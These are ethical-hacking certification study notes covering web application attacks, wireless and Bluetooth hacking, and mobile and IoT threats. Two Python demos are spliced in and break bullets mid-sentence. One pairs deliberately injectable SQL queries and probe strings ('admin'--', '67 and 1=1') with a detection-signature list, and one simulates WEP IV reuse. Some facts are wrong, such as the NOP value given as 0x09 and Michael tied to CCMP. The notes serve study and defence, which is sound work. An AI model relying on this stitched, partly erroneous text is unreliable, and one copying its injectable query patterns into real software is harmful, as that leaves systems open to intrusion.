    - Using custom error messages
  - To counter **No data validation at the server**
    - Filtering all client data
    - Sanitizing data
- Tools
  - Sqlmap
  - sqlninja

#### XSS \(Cross-site scripting\)

- Inputting JavaScript into a web form alters what the page does
- Can also be passed via URL `http://IPADDRESS/";!--"=&{()}`
- Can be malicious by accessing cookies and sending them to a remote host
- Can be mitigated by setting the **HttpOnly** flag on cookies
- **DOM Based XSS** (Type 0): a form of XSS where the entire tainted data flow from source to sink takes place in the browser, and the data never leaves the browser, e.g. the URL of the page or an element of the HTML
- **Stored XSS** (Persistent or Type I): stores the XSS payload in a forum or the like on the target server, for multiple people to access
- **Reflected XSS** (Non-persistent or Type II): occurs when user input is immediately returned by a web application, without permanently storing the user-provided data

#### CSRF \(Cross-Site Request Forgery\)

- Forcing an end user to execute unwanted actions on an app they're already authenticated on
- Inheriting the identity and privileges of the victim to perform an undesired function on the victim's behalf
- Captures the session and sends a request based off the logged-in user's credentials
- Can be mitigated by sending **random challenge tokens**

#### Clickjacking

- Also known as a user interface redress attack
- Used to trick web users into clicking something different from what they think they are clicking

#### Buffer Overflow \(Smashing the stack\)

- Attempting to write data into an application's buffer area to overwrite adjacent memory, execute code or crash a system
- Inputting more data than the buffer is allowed
- 
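Added example for the SQL injection section above (not code from the original notes): the boolean-based blind probe `id=67 and 1=2` / `1=1` and the `admin'--` end-of-line comment run against an in-memory SQLite database, with each string-built query beside its parameterized counterpart, plus a small classifier that tags logged request parameters with the injection types listed above. The tables, rows, URLs and signature patterns are constructed for the demo.

```python
"""Added example (not from the original notes): the boolean-based blind and
end-of-line comment cases from the SQL injection section, run against an
in-memory SQLite database, with each string-built query beside a parameterized
one, plus a small classifier for the injection types the section lists.
The tables, rows and signature patterns are constructed for this demo."""
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit


def build_db() -> sqlite3.Connection:
    """Constructed sample data: an `items` table and a `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO items VALUES (66, 'Cable'), (67, 'Router'), (68, 'Switch');
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
        """
    )
    return conn


def vulnerable_item_lookup(conn: sqlite3.Connection, item_id: str) -> list:
    """String concatenation: `id=67 and 1=2` rewrites the WHERE clause (UNSAFE)."""
    query = "SELECT id, name FROM items WHERE id=" + item_id
    return conn.execute(query).fetchall()


def safe_item_lookup(conn: sqlite3.Connection, item_id: str) -> list:
    """Type-check the input, then bind it: the value can never alter the query."""
    try:
        numeric_id = int(item_id)  # "67 and 1=1" fails validation here
    except ValueError:
        return []
    query = "SELECT id, name FROM items WHERE id=?"
    return conn.execute(query, (numeric_id,)).fetchall()


def vulnerable_login(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """String-built check: `admin'--` comments out the password test (UNSAFE)."""
    query = ("SELECT 1 FROM users WHERE name='" + name
             + "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Parameterized check: the `'--` characters stay inside the bound string."""
    query = "SELECT 1 FROM users WHERE name=? AND password=?"
    return conn.execute(query, (name, password)).fetchone() is not None


# Signatures for the injection types named in the section; matches are reported
# in this order. Constructed for log review, not as a blocking filter.
INJECTION_SIGNATURES = (
    ("tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),
    ("boolean_expression", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("end_of_line_comment", re.compile(r"--")),
    ("inline_comment", re.compile(r"/\*.*?\*/", re.S)),
    ("union", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("piggybacked", re.compile(r";\s*(drop|insert|update|delete|exec|xp_)", re.I)),
)


def classify_request(url: str) -> dict:
    """Map each query parameter of a logged URL to the injection classes it matches."""
    findings = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = [name for name, pattern in INJECTION_SIGNATURES if pattern.search(value)]
        if hits:
            findings[key] = hits
    return findings


if __name__ == "__main__":
    db = build_db()
    for probe in ("67", "67 and 1=2", "67 and 1=1"):
        print(f"id={probe!r:14} vulnerable={vulnerable_item_lookup(db, probe)} "
              f"safe={safe_item_lookup(db, probe)}")
    print("vulnerable login admin'-- :", vulnerable_login(db, "admin'--", "wrong"))
    print("safe login admin'--       :", safe_login(db, "admin'--", "wrong"))
    print(classify_request("https://example.com/item.aspx?id=67 and 1=1"))
```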
  Including stack, heap, NOP sleds \(hex value 0x09\) and more

#### Other attacks

- **Session Fixation**: the attacker logs into a legitimate site and pulls a session ID, then sends a link with that session ID to the victim. Once the victim logs in, the attacker can log in and run with the user's credentials
- **Fuzzing**: inputting random data into a target to see what will happen
- **HTTP Response Splitting**
  - Adding header response data to an input field so the server splits the response
  - It's not an attack by itself, so it must be combined with another attack
  - Can be used to redirect a user to a malicious site
- **CSPP** \(Connection String Parameter Pollution\): polluting the connection strings between the web application authenticating a user and the database, for example by injecting phony parameters into the connection strings using semicolons as separators

--------------------------------------------------------------------------------
/07-wireless_network_hacking.md:
--------------------------------------------------------------------------------

# 07-Wireless Network Hacking

## Table of Contents

- [Wireless Network Hacking](07-wireless_network_hacking.md#wireless-network-hacking)
  - [Wireless Terminologies](07-wireless_network_hacking.md#wireless-terminologies)
    - [Types of Wireless Authentication Model](07-wireless_network_hacking.md#types-of-wireless-authentication-model)
    - [Types of Wireless Antennas](07-wireless_network_hacking.md#types-of-wireless-antennas)
  - [Wireless Standards](07-wireless_network_hacking.md#wireless-standards)
    - [How to remember all 802.11x standards](07-wireless_network_hacking.md#how-to-remember-all-80211x-standards)
  - [Wireless Encryption](07-wireless_network_hacking.md#wireless-encryption)
    - [WEP \(Wired Equivalent Privacy\)](07-wireless_network_hacking.md#wep-wired-equivalent-privacy)
      - [IV \(Initialization Vector\)](07-wireless_network_hacking.md#iv-initialization-vector)
    - [WPA/WPA2 \(Wi-Fi Protected Access\)](07-wireless_network_hacking.md#wpawpa2-wi-fi-protected-access)
  - [Wireless Hacking Threats](07-wireless_network_hacking.md#wireless-hacking-threats)
  - [Wireless Attacks](07-wireless_network_hacking.md#wireless-attacks)
    - [Rogue Access Point](07-wireless_network_hacking.md#rogue-access-point)
    - [Evil Twin](07-wireless_network_hacking.md#evil-twin)
    - [Honeypot AP Attack](07-wireless_network_hacking.md#honeypot-ap-attack)
    - [Ad Hoc Connection Attack](07-wireless_network_hacking.md#ad-hoc-connection-attack)
    - [DoS Attack](07-wireless_network_hacking.md#dos-attack)
    - [MAC Filter](07-wireless_network_hacking.md#mac-filter)
  - [Wireless Hacking Methodology](07-wireless_network_hacking.md#wireless-hacking-methodology)
    - [Network Discovery](07-wireless_network_hacking.md#network-discovery)
    - [GPS Mapping](07-wireless_network_hacking.md#gps-mapping)
    - [Wireless Traffic Analysis](07-wireless_network_hacking.md#wireless-traffic-analysis)
    - [Tools](07-wireless_network_hacking.md#tools)
    - [Wireless Encryption Cracking](07-wireless_network_hacking.md#wireless-encryption-cracking)
      - [WEP Cracking](07-wireless_network_hacking.md#wep-cracking)
      - [WPA Cracking](07-wireless_network_hacking.md#wpa-cracking)
  - [Bluetooth Hacking](07-wireless_network_hacking.md#bluetooth-hacking)
    - [Bluetooth Modes](07-wireless_network_hacking.md#bluetooth-modes)
    - [Bluetooth Attacks](07-wireless_network_hacking.md#bluetooth-attacks)

## Wireless Network Hacking

### Wireless Terminologies

- **Access Point** \(AP\): used to connect wireless devices to a wireless/wired network
- **Association**: the process of connecting a wireless device to an AP
- **Service Set Identifier** \(SSID\)
  - 32-character unique wireless identifier given to a WLAN
  - Can be hidden, but this provides no security
- **Orthogonal Frequency-Division Multiplexing** \(OFDM\): carrying waves in various channels
- **Multiple Input, Multiple Output OFDM** \(MIMO-OFDM\): influencing the spectral efficiency of 4G and 5G services
- **Direct-Sequence Spread Spectrum** \(DSSS\): combining all available waveforms into a single purpose
- **Frequency-Hopping Spread Spectrum** \(FHSS\): also known as FH-CDMA; transmitting radio signals by rapidly switching a carrier among many frequency channels
- **Basic Service Set** \(BSS\): communication between a single AP and its clients
- **Basic Service Set Identifier** \(BSSID\): MAC address of the wireless access point
- **ISM Band**: a set of frequencies for the international industrial, scientific, and medical communities
- **Spectrum Analyzer**: verifies wireless quality, detects rogue access points and detects attacks; a Wireless Intrusion Prevention System \(WIPS\) is also capable of searching for and locating rogue access points
- **2 types of wireless networks**: Ad hoc \(no access point\) and Infrastructure
- **LEAP**: proprietary version of EAP developed by Cisco
- **PEAP**: protocol that encapsulates EAP within a TLS tunnel

#### Types of Wireless Authentication Model

- **Open System**: no authentication
- **Shared Key Authentication**: authentication through a shared key/password
- **Centralized Authentication**: authentication through something like RADIUS \(Remote Authentication Dial-In User Service\)

#### Types of Wireless Antennas

- **Directional Antenna**: **uni**directional antenna, signals in one direction, e.g. Yagi-Uda antenna
- **Omnidirectional Antenna**: signals in all directions
- **Parabolic Grid Antenna**: a semi-dish in the form of a grid; long-distance Wi-Fi transmissions by making highly focused radio beams
- **Dipole Antenna**: also called a doublet; a bilaterally symmetrical balanced antenna fed by a balanced parallel-wire RF transmission line
- **Reflector Antenna**: used to concentrate EM energy that is radiated or received at a focal point

### Wireless Standards

| Standard | Speed \(Mbps\) | Freq. \(GHz\) | Modulation Type | Range \(Meters\) |
| :----------------- | :------------- | :------------ | :-------------------- | :--------------- |
| 802.11 | 1, 2 | 2.4 | DSSS, FHSS | 20-100 |
| 802.11a | 54 | 5 | OFDM | 35-100 |
| 802.11b | 11 | 2.4 | DSSS | 35-140 |
| 802.11g | 54 | 2.4 | OFDM | 38-140 |
| 802.11n | 54-600 | 2.4, 5 | MIMO-OFDM | 70-250 |
| 802.15.1 Bluetooth | 25-50 | 2.4 | GFSK, π/4-DPSK, 8DPSK | 10-240 |
| 802.15.4 Zigbee | 0.25 | 2.4 | O-QPSK, GFSK, BPSK | 1-100 |
| 802.16 WiMax | 34-1000 | 2-11 | SOFDMA | 1600-9650 |

- **802.11d**: enhancement to 802.11a and 802.11b for global portability; allows variation in frequency, power levels, and bandwidth
- **802.11e**: guidance for prioritization of data, voice and video transmission, enabling QoS
- **802.11i**: standard for WLANs \(Wireless Local Area Networks\) that provides improved encryption for networks using the 802.11a, 802.11b, and 802.11g standards; defines WPA2-Enterprise/WPA2-Personal for Wi-Fi
- **802.11ac**: high-throughput network at 5 GHz, faster and more reliable than 802.11n, Gigabit networking
- **Z-Wave**: primarily for home automation, 800-900 MHz radio, 100 meters range

#### How to remember all 802.11x standards

- **Speed 54 OFDM**: ang
- **Frequency 5**: an
- **Range**: a\<b=g\<n
- **n**: s600, f2.4/5, MIMO-OFDM, 250
- **d/e/i/ac**: **d**iversity global, **e**nsure QoS, **i**mplement encryption, **ac**celeration

### Wireless Encryption

#### WEP \(Wired Equivalent Privacy\)

- WEP doesn't effectively encrypt anything

##### IV \(Initialization Vector\)

- Used to calculate a 32-bit integrity check value \(ICV\)
- IVs are generally small and are frequently reused
- Sent in clear text as part of the header; combined with RC4, this makes it easy to recover the WEP key
- An attacker can send disassociate requests to the AP to generate a lot of these

#### WPA/WPA2 \(Wi-Fi Protected Access\)

- WPA uses TKIP \(Temporal Key Integrity Protocol\) with a 128-bit key
- WPA changes the key every 10,000 packets
- WPA transfers keys back and forth during an **Extensible Authentication Protocol** \(EAP\) exchange
- WPA uses a four-way handshake to derive keys
- **WPA2 Personal**: using a Pre-Shared Key \(PSK\) to authenticate, a preconfigured password
- **WPA2 Enterprise**: can tie an EAP or RADIUS server into the authentication
- WPA2 ensures FIPS 140-2 compliance
- **Message Integrity Code** \(MIC\): named Michael; hashes for CCMP to protect integrity
- **Cipher Block Chaining Message Authentication Code** \(CBC-MAC\): integrity process of WPA2

| Wireless Standard | Encryption | IV Size \(Bits\) | Key Length \(Bits\) | Integrity Check \(ICV\) |
| :---------------- | :--------- | :--------------- | :------------------ | :---------------------- |
| WEP | RC4 | 24 | 40/104 | CRC-32 |
| WPA | RC4 + TKIP | 48 | 128 | MIC/CRC-32 |
| WPA2 | AES-CCMP | 48 | 128 | CBC-MAC \(CCMP\) |

### Wireless Hacking Threats

- Access Control Attacks: War Driving, Rogue AP, MAC Spoofing, AP Misconfiguration, Ad Hoc Association, Promiscuous Client, Client Mis-association, Unauthorized Association
- Integrity Attacks: Data Frame Injection, WEP Injection, Bit-Flipping Attack, Replay Attacks
- Confidentiality Attacks: Eavesdropping, Traffic Analysis, Cracking WEP Key, Evil Twin AP, Honeypot AP, Session Hijacking, Masquerading, MITM
- Availability Attacks: AP Theft, Disassociation Attack, EAP Failure, Beacon Flood, DoS, Auth/De-auth Flood,
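Added example for the WEP IV bullets above (not from the original notes): the birthday-bound arithmetic behind "IVs are small and frequently reused", comparing WEP's 24-bit IV with the 48-bit IV in the WPA/WPA2 table, a seeded simulation of the first repeat, and a demonstration of why a repeated keystream matters for an RC4-style stream cipher. The keystream bytes and sample frames are constructed stand-ins, not real RC4 output.

```python
"""Added example (not from the original notes): the arithmetic behind the WEP IV
weaknesses. It estimates how soon a 24-bit IV repeats (WEP) versus a 48-bit one
(WPA/WPA2 column of the table), simulates the first repeat, and shows why a
repeat matters for an RC4-style stream cipher: identical keystream leaks the XOR
of the two plaintexts. Keystream bytes here are constructed, not real RC4."""
import math
import random


def expected_packets_until_iv_reuse(iv_bits: int) -> float:
    """Birthday-bound estimate of frames sent before a random IV first repeats."""
    space = 2 ** iv_bits
    return math.sqrt(math.pi * space / 2)


def iv_reuse_probability(packets: int, iv_bits: int) -> float:
    """Probability that at least one IV value repeats among `packets` random IVs."""
    space = 2 ** iv_bits
    if packets < 2:
        return 0.0
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * space))


def simulate_first_iv_reuse(iv_bits: int, seed: int = 1) -> int:
    """Draw random IVs until one repeats; return how many frames that took."""
    rng = random.Random(seed)  # seeded so the run is reproducible
    seen = set()
    sent = 0
    while True:
        iv = rng.getrandbits(iv_bits)
        sent += 1
        if iv in seen:
            return sent
        seen.add(iv)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(plain1: bytes, plain2: bytes, keystream: bytes) -> bytes:
    """Encrypt two frames under one (IV, key) keystream and XOR the ciphertexts.
    The result equals plain1 XOR plain2: the key never had to be recovered."""
    cipher1 = xor_bytes(plain1, keystream)
    cipher2 = xor_bytes(plain2, keystream)
    return xor_bytes(cipher1, cipher2)


if __name__ == "__main__":
    for bits, label in ((24, "WEP"), (48, "WPA/WPA2")):
        print(f"{label}: {bits}-bit IV, expected first reuse after "
              f"~{expected_packets_until_iv_reuse(bits):,.0f} frames")
    print("P(reuse) after 5000 WEP frames:", round(iv_reuse_probability(5000, 24), 3))
    print("simulated first WEP IV reuse at frame", simulate_first_iv_reuse(24))
    ks = bytes(range(0x10, 0x20))  # constructed stand-in for an RC4 keystream
    frame1, frame2 = b"GET /index.html ", b"POST /login.php "
    leak = keystream_reuse_leak(frame1, frame2, ks)
    print("ciphertext XOR == plaintext XOR:", leak == xor_bytes(frame1, frame2))
```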
  Routing Attack, ARP Cache Poisoning Attack
- Authentication Attacks: Cracking, Identity Theft, Shared Key Guessing, Password Speculation, Application Login Theft, Key Reinstallation Attack

### Wireless Attacks

#### Rogue Access Point

- Placing an access point controlled by an attacker

#### Evil Twin

- Also known as a mis-association attack
- A rogue AP with an SSID similar to the name of a popular network

#### Honeypot AP Attack

- Faking a well-known hotspot with a rogue AP

#### Ad Hoc Connection Attack

- Directly connecting to another phone via an ad-hoc network
- Not very successful, as the other user has to accept the connection

#### DoS Attack

- Either sends de-auth packets to the AP or jams the wireless signal
- With a de-auth, the attacker can have the users connect to the attacker's AP instead if it has the same name

#### MAC Filter

- Only allowing certain MAC addresses on a network
- Easily broken because you can sniff out MAC addresses already connected and spoof one
- Tools for spoofing include **SMAC** and **TMAC**

### Wireless Hacking Methodology

#### Network Discovery

- WarWalking: walking around with Wi-Fi to detect open wireless networks
- WarDriving: driving around with Wi-Fi to detect open wireless networks
- WarFlying: using drones to detect wireless networks
- WarChalking: drawing symbols in public places to advertise open Wi-Fi networks
- Tools
  - inSSIDer Office: Wi-Fi optimization and troubleshooting tool
  - WifiExplorer: known as a Wi-Fi scanner; mobile platform to discover Wi-Fi networks

#### GPS Mapping

- Discovers a target wireless network, then draws a map of the network
- Tools
  - WiGLE: map of wireless networks
  - NetStumbler: tool to find networks, a Windows tool
  - Skyhook: Wi-Fi AP database
  - Wi-Fi Finder: hotspot finder

#### Wireless Traffic Analysis

- Determine Wi-Fi requirements
- Learn the capabilities of a wireless card
- Determine the chipset of the Wi-Fi card
- Verify chipset capabilities
- Determine drivers and patches required
- Tools
  - AirPcap: Wi-Fi USB dongle
  - Wireshark with AirPcap: Wi-Fi packet sniffer
  - SteelCentral Packet Analyzer
  - OmniPeek Enterprise
  - Ekahau Spectrum Analyzer
  - Airodump-ng: reveals hidden SSIDs
  - AirMagnet WiFi Analyzer
  - **Kismet**
    - Wireless packet analyzer/sniffer used for discovery
    - Works on Linux and OSX, and on Windows 10 under WSL
    - Works without sending any packets \(passively\)
    - Works by channel hopping
    - Can detect access points that have not been configured
    - Can discover wireless networks that are not sending beacon frames
    - Ability to sniff packets and save them to a log file \(readable by Wireshark/tcpdump\)

#### Tools

- **NetSurveyor**
  - Tool for Windows with features similar to NetStumbler and Kismet
  - Doesn't require special drivers
- **WiFi Adapter**
  - AirPcap is mentioned for Windows, but isn't made anymore
  - **pcap**: driver library for Windows

    ```text
    port and host
    ```

  - **libpcap**: driver library for Linux
- Cisco Adaptive Wireless IPS: security auditing tool
- WatchGuard WIPS: IPS
- AirMagnet Planner: wireless network planning tool
- Zenmap: vulnerability scanning tool
- Wi-Fi Protector: protects the phone from ARP attacks, such as DoS or MITM
- WiFiGuard

#### Wireless Encryption Cracking

##### WEP Cracking

- Easy because of weak IVs
- Process
  1. Start a compatible adapter with injection and sniffing capabilities
  2. Start a sniffer to capture packets
  3. Force the creation of thousands of packets \(generally with de-auth\)
  4. Analyze captured packets
- Methods to crack WEP include the **PTW**, **FMS** and **Korek** techniques
- Tools
  - **Aircrack-ng**
    - Sniffer, detector, traffic analysis tool and password cracker
    - Uses **dictionary list** attacks for WPA and WPA2
    - The other attacks, **PTW**, **FMS**, and **Korek**, are for WEP only
  - Cain and Abel
    - Sniffs packets and cracks passwords \(may take longer\)
    - Relies on statistical measures and the PTW technique to break WEP
  - KisMAC: macOS tool to brute-force WEP or WPA passwords
  - WEPAttack
  - WEPCrack
  - Portable Penetrator

##### WPA Cracking

- Much more difficult than WEP cracking
- Uses a constantly changing temporal key and a user-defined password
- **Key Reinstallation Attack** \(KRACK\): replay attack that uses the third handshake message of another device's session
- Most other attacks are simply brute-forcing the password
- Tools
  - Elcomsoft Wireless Security Auditor
  - WIBR: WiFi Bruteforce Hack

### Bluetooth Hacking

#### Bluetooth Modes

- **Discovery mode**: how the device reacts to inquiries from other devices
  - **Discoverable**: answers all inquiries
  - **Limited Discoverable**: restricts the action
  - **Nondiscoverable**: ignores all inquiries
- **Pairing mode**: how the device deals with pairing requests
  - **Pairable**: accepts all requests
  - **Non-pairable**: rejects all connection requests

#### Bluetooth Attacks

- **Bluesmacking**: sending an oversized ping to the victim's device, a DoS attack
- **Bluejacking**: sending unsolicited messages
- **Bluesnarfing**: stealing information via Bluetooth
- **Bluesniffing**: finding hidden and discoverable Bluetooth devices
- **Bluebugging**: remotely taking over a device via Bluetooth, sniffs data
- **Blueprinting**: collecting device information over Bluetooth to create infographics
- Other attacks: MAC Spoofing Attack, MITM/Impersonation Attack
- Tools
  - BluetoothView: monitors the activity of Bluetooth devices around you
  - Super Bluetooth Hack: all-in-one package
  - Bluetooth Firewall

--------------------------------------------------------------------------------
/08-mobile_and_iot_hacking.md:
--------------------------------------------------------------------------------

# 08-Mobile and IoT Hacking

## Table of Contents

- [Mobile and IoT Hacking](08-mobile_and_iot_hacking.md#mobile-and-iot-hacking)
  - [Mobile Platform Hacking](08-mobile_and_iot_hacking.md#mobile-platform-hacking)
    - [Three Main Avenues of Attack](08-mobile_and_iot_hacking.md#three-main-avenues-of-attack)
      - [Device Attacks](08-mobile_and_iot_hacking.md#device-attacks)
      - [Network Attacks](08-mobile_and_iot_hacking.md#network-attacks)
      - [Data Center/Cloud Attacks](08-mobile_and_iot_hacking.md#data-centercloud-attacks)
    - [OWASP Top 10 Mobile Risks 2016](08-mobile_and_iot_hacking.md#owasp-top-10-mobile-risks-2016)
    - [Mobile Platforms](08-mobile_and_iot_hacking.md#mobile-platforms)
      - [Android Rooting](08-mobile_and_iot_hacking.md#android-rooting)
      - [iOS Jailbreaking](08-mobile_and_iot_hacking.md#ios-jailbreaking)
    - [Mobile Attacks](08-mobile_and_iot_hacking.md#mobile-attacks)
  - [IoT Hacking](08-mobile_and_iot_hacking.md#iot-hacking)
    - [Basic Components](08-mobile_and_iot_hacking.md#basic-components)
    - [Architecture Levels](08-mobile_and_iot_hacking.md#architecture-levels)
    - [IoT Technologies and Protocols](08-mobile_and_iot_hacking.md#iot-technologies-and-protocols)
    - [IoT Operating Systems](08-mobile_and_iot_hacking.md#iot-operating-systems)
    - [IoT Communicating Models](08-mobile_and_iot_hacking.md#iot-communicating-models)
    - [Threat vs Opportunity](08-mobile_and_iot_hacking.md#threat-vs-opportunity)
    - [OWASP Top 10 IoT Risks 2014](08-mobile_and_iot_hacking.md#owasp-top-10-iot-risks-2014)
    - [IoT Attacks](08-mobile_and_iot_hacking.md#iot-attacks)

## Mobile and IoT Hacking

### Mobile Platform Hacking

#### Three Main Avenues of Attack

##### Device Attacks

- Browser based: Phishing, Framing \(using iFrame\), Clickjacking, Man-in-the-Mobile, Buffer Overflow, Data Caching
- Phone/SMS based: Baseband Attack \(GSM/3GPP vulnerability\), SMiShing
- Application based: Sensitive Data Storage, No/Weak Encryption, Improper SSL Validation, Configuration Manipulation, Dynamic Runtime Injection, Unintended Permissions, Escalated Privileges
- OS based: No/Weak Passcode, iOS Jailbreaking, Android Rooting, OS Data Caching, Passwords and Data Accessible, Carrier-loaded Software, User-initiated Code

##### Network Attacks

- Wi-Fi, Rogue AP, Packet Sniffing, MITM, Session Hijacking, DNS Poisoning, SSLStrip \(MITM, SSL/TLS vulnerability\), Fake SSL Certificates

##### Data Center/Cloud Attacks

- Web server based: Platform Vulnerabilities, Server Misconfiguration, XSS, CSRF, Weak Input Validation, Brute-Force
- Database based: SQL Injection, Privilege Escalation, Data Dumping, OS Command Execution

#### OWASP Top 10 Mobile Risks 2016

- **M1 Improper Platform Usage**: misuse of platform features or security controls \(Android intents, TouchID, Keychain\)
- **M2 Insecure Data Storage**: improperly stored data and data leakage
- **M3 Insecure Communication**: poor handshaking, incorrect SSL, clear-text communication
- **M4 Insecure Authentication**: failures in authenticating the end user or bad session management
- **M5 Insufficient Cryptography**: code that applies cryptography to an asset, but insufficiently \(does NOT include SSL/TLS\)
- **M6 Insecure Authorization**: failures in authorization \(access rights\)
- **M7 Client Code Quality**: catch-all for code-level implementation problems
- **M8 Code Tampering**: binary patching, resource modification, dynamic memory modification
- **M9 Reverse Engineering**: reversing core binaries to find problems and exploits
- **M10 Extraneous Functionality**: catch-all for backdoors that were inadvertently placed by coders

#### Mobile Platforms

- **Mobile Device Management** \(MDM\)
  - Helps enforce security and deploy apps from the enterprise
  - MDM solutions include IBM MaaS360, XenMobile
- **Bring Your Own Device** \(BYOD\): dangerous for organizations because not all phones can be locked down by default

##### Android Rooting

- Ability to have root access on an Android device
- Tools: KingoRoot, TunesGo Root Android Tool

##### iOS Jailbreaking

- Installing a modified set of kernel patches that allows users to run unsigned applications, bypassing user limitations set by Apple
- **Userland Exploit**
  - Uses a loophole in a system app
  - Allows user-level access but not iBoot-level access
  - Firmware updates can patch it
- **iBoot Exploit**
  - Uses a loophole in iBoot \(the iDevice's third bootloader\)
  - Can be semi-tethered
  - Allows user-level access and iBoot-level access
  - Firmware updates can patch it
- **BootROM Exploit**
  - Uses a loophole in SecureROM \(the iDevice's first bootloader\)
  - Allows user-level access and iBoot-level access
  - Firmware updates can **NOT** patch it
  - Only a hardware update of the bootrom by Apple can patch it
- **Untethered**: kernel remains patched after reboot, with or without a system connection
- **Semi-Tethered**: no longer retains patches after reboot, but the device is still usable as normal
- **Tethered**: removes all patches after reboot; the device may get stuck in a boot loop and must be re-jailbroken with a computer
- Tools
  - Cydia: app for iOS to find and install software on a jailbroken iOS device
  - Pangu Anzhuang: app-based jailbreak method, no PC required
  - Keen Jailbreak: an unofficial semi-tethered tool

#### Mobile Attacks

- **App Store attacks**: malicious apps placed in an app store, no vetting
- **Android Device Administration API**: allows for security-aware apps that may help
- **SMS Phishing** \(SMiShing\)
  - Sending text messages with malicious links
  - People tend to trust these more because they happen less often
- Apps
  - NetCut: blocks Wi-Fi access, works only on rooted devices
  - zANTI: hacking app
  - Network Spoofer: changes websites from an Android phone
  - Low Orbit Ion Cannon \(LOIC\): performs DoS/DDoS attacks
  - DroidSheep: performs session hijacking/sidejacking, using libpcap and arpspoof
  - Orbot Proxy: Tor
  - FaceNiff: sniffer
- Trojans
  - BankBot/Spy.Banker.LA: Android banking Trojan
  - SpyDealer: Android spying Trojan
  - AceDeceiver Trojan: iOS Trojan, MITM
  - Spy/MobileSpy!iPhoneOS: iOS Trojan
  - ZitMo: Zeus-in-the-mobile, banking Trojan
- Mobile Spyware
  - mSpy
  - FlexiSPY
- Security Tools
  - Find My Device/Phone: tracking tool
  - Kaspersky Mobile Antivirus
  - X-Ray: vulnerability scanner
  - Avira Mobile Security
  - Lookout Personal: identity protection, theft prevention
  - Zimperium's zIPS: mobile intrusion prevention system app
  - BullGuard Mobile Security: complete mobile phone antivirus
  - Malwarebytes for Android: anti-spyware
- Pen Testing Tool: Hackode

### IoT Hacking

- IoT is a collection of devices using sensors, software, storage and electronics to collect, analyze, store and share data
- Application + Network + Mobile + Cloud = IoT

#### Basic Components

- Sensing Technology: sensors
- IoT gateways: used to bridge the gap between the IoT device and the end user
- Cloud Server/Data Storage
- Remote Control using Mobile App

#### Architecture Levels

- **Edge Technology Layer**: consisting of sensors, RFID tags, readers and the devices
- **Access Gateway Layer**: first data handling, message identification and routing
- **Internet Layer**: crucial layer which serves as the main component allowing communication
- **Middleware Layer**: two-way mode, between application and hardware; handles data and device management, data analysis and aggregation
- **Application Layer**: responsible for delivery of services and data to users

#### IoT Technologies and Protocols

- **Short Range Wireless Communication**: Bluetooth Low Energy \(BLE\), Light-Fidelity \(Li-Fi\), Near-field Communication \(NFC\), QR Codes and Barcodes, Radio Frequency Identification \(RFID\), Thread, Wi-Fi, Wi-Fi Direct, Z-Wave, Zig-Bee
- **Medium Range Wireless Communication**: HaLow, LTE-Advanced
- **Long Range Wireless Communication**: LPWAN, Very Small Aperture Terminal \(VSAT\), Cellular
- **Wired Communication**: Ethernet, Multimedia over Coax Alliance \(MoCA\), Power-line Communication \(PLC\)

#### IoT Operating Systems

- **RIOT OS**: embedded systems, actuator boards, sensors; is energy efficient
- **ARM mbed OS**: mostly used on wearables and other low-powered devices
- **RealSense OS X**: Intel's depth-sensing version; mostly found in cameras and other sensors
- **Nucleus RTOS**: used in aerospace, medical and industrial applications
- **Brillo**: Android-based OS; generally found in thermostats
- **Contiki**: OS made for low-power devices; found mostly in street lighting and sound monitoring
- **Zephyr**: option for low-power devices and devices without many resources
- **Ubuntu Core**: used in robots and drones; known as "snappy"
- **Integrity RTOS**: found in aerospace, medical, defense, industrial and automotive sensors
- **Apache Mynewt**: used in devices using the Bluetooth Low Energy protocol

#### IoT Communicating Models

- **Device to Device**: communicates directly with other IoT devices
- **Device to Cloud**: communicates directly with a cloud service
- **Device to Gateway**: communicates with a gateway before sending to the cloud
- **Back-End Data Sharing**: like device to cloud, but adds the ability for third parties to collect and use the data

#### Threat vs Opportunity

- **Misconfigured** and **Misapprehended**: posing unprecedented risk to personal data, privacy and safety
- **Apprehended** and **Protected**: boosting transmissions, communications, delivery of services and standard of living

#### OWASP Top 10 IoT Risks 2014

- I1 Insecure Web Interface
- I2 Insufficient Authentication/Authorization
- I3 Insecure Network Services
- I4 Lack of Transport Encryption/Integrity Verification
- I5 Privacy Concerns
- I6 Insecure Cloud Interface
- I7 Insecure Mobile Interface
- I8 Insufficient Security Configurability
- I9 Insecure Software/Firmware
- I10 Poor Physical Security

#### IoT Attacks

- **Exploiting HVAC Attack**: attacking HVAC \(Heating, Ventilation and Air Conditioning\) systems
- **Rolling Code**: jamming a key fob's communications, stealing the code and then creating a subsequent code
- **BlueBorne Attack**: attacking Bluetooth devices by exploiting vulnerabilities in the Bluetooth protocol
- **Jamming Attack**: jamming the signal between sender and receiver with malicious traffic, making the two endpoints unable to communicate with each other
- **Remote Access using Backdoor**: exploiting vulnerabilities in an IoT device to turn it into a backdoor and gain access to the target network
- **Remote Access using Telnet**: exploiting an open telnet port to obtain information
- **Sybil Attack**: using multiple forged identities to create the illusion of traffic
- **Replay Attack**: intercepting legitimate messages from a valid communication and continuously sending the intercepted message to the target device to perform a DoS attack or crash the target device
- **Forged Malicious Device**: replacing authentic IoT devices with malicious ones, if the attacker has physical access to the network
- Other attacks: Exploit Kits, DDoS Attack, MITM Attack, Side Channel Attack, Ransomware Attack
- Case Study: **Dyn Attack**
  - **Mirai** malware: finds IoT devices to infect and adds them to a botnet
  - Triggered a 1+ Tbps DDoS attack on OVH and Dyn in October 2016
- Hacking Tools
  - Search engines: Shodan, Censys, Thingful
  - MultiPing: information gathering tool to find the IP address of any IoT device
  - Foren6: IoT traffic sniffer
